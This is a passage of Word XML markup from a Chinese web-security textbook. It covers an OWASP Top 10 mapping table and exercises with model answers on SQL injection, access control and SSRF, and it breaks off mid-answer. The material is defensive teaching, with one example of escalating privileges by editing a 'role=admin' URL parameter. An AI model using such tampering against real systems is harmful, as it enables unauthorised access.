                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">核心被违反的假设</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">本卷对应章</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">注入（Injection）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">数据与代码的边界能被字符串拼接所维持</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 9 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">章：SQL</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">注入与命令注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">失效的访问控制（Broken</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Access </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Control）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">权限检查在每一请求路径上都被正确执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 11 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">章（认证/越权），第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 12 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">章（API</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">BOLA）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">加密失败（Cryptographic</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Failures）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">敏感数据在传输与存储中得到有效加密</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 8.1 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">节（安全头），第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 11 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">章（会话令牌安全）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">安全配置错误（Security</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Misconfiguration）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">默认配置足够安全</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 11 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">章（上传/执行权限），第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 12 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">章（SDL）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">服务端请求伪造（SSRF）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">服务器只访问它该访问的资源</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 10.2 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">节</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">软件与数据完整性故障（Software</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and Data Integrity </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Failures）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">运行的代码与数据来自可信源且未被篡改</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 12.1 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">节（反序列化/SSTI）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">认证失败（Identification</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and Authentication </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Failures）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">只有合法用户能通过身份验证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 11.1 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">节</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">安全日志与监控失败（Security</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Logging and Monitoring </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Failures）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">攻击行为会被及时发现与追溯</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">全卷防御对照框贯穿</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">跨站脚本（XSS）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">浏览器能区分代码与数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 10.1 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">节</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">跨站请求伪造（CSRF）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">请求确实来自用户的真实意愿</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 10.2 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">节</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此表既是本卷读者规划学习路径的导航，也是实战中识别攻击面时的分类参考。OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的设计初衷——为社区提供一个不遗漏重大风险的讨论框架——在本卷以攻防对称的方式得到完整映射：每一个类别都在后续章节中拥有独立的原理阐述、靶机实验和防御对照。结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节所掌握的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理拦截能力，读者可以在后续每一章中，沿着这张地图，系统性地实现在授权靶机上的“观察—干预—验证”测试闭环。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="159"/>
    <w:bookmarkStart w:id="160" w:name="提取型习题"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提取型习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节习题为提取题，要求从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分类框架中提取核心因果链。目的是帮助读者从“知道分类名称”进阶到“理解该风险类别的第一性原理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">每类被违反的安全假设是什么、为什么危害大、根治方法的核心思路是什么”。以下选</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类进行复述性作答。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8-1：注入（Injection）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题目：用你自己的语言，复述</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入产生的根本原因，以及为何参数化查询可以从根本上消除该类漏洞。（提示：从“数据与代码的边界”这一概念入手）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">要求：不超过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 150 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字。必须包含“字符串拼接”与“预编译”两个关键词。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8-2：失效的访问控制（Broken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Control）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题目：举出两种典型的访问控制失效场景，并说明它们分别违反了开发者哪一项安全假设。（提示：考虑垂直越权与水平越权）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">要求：每种场景用一段话描述，每段不超过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 80 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8-3：服务端请求伪造（SSRF）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题目：为何</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在云原生环境中尤其危险？请结合服务器在网络拓扑中的信任位置，指出被违反的假设。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">要求：不超过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 120 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字。需提及“出站白名单”作为防御核心。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题解答</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 8-1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入的根本原因是应用通过字符串拼接将用户输入直接嵌入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语句，从而混淆了“数据”与“代码”的边界。攻击者输入特制的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关键字与元字符，使部分数据被解释为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指令执行。参数化查询从根本上消除此问题，因为它将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语句的结构与数据参数彻底分离：在预编译阶段，SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的结构已被数据库固定，后续传入的参数无论包含什么字符均只能被当作纯数据处理，绝无可能改变</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的逻辑语义。因此，假设“数据与代码可以通过转义来区分”被参数化查询中“数据就是数据，永远不会变成代码”这一更强的保证所取代。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 8-2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">垂直越权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：普通用户通过修改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">role=admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数或直接访问管理员接口，获得了只有管理员才能使用的功能。违反的假设是“仅在前端隐藏管理入口就足够安全”——后端未在每个请求上执行独立的权限校验。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">水平越权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：用户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将请求参数</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
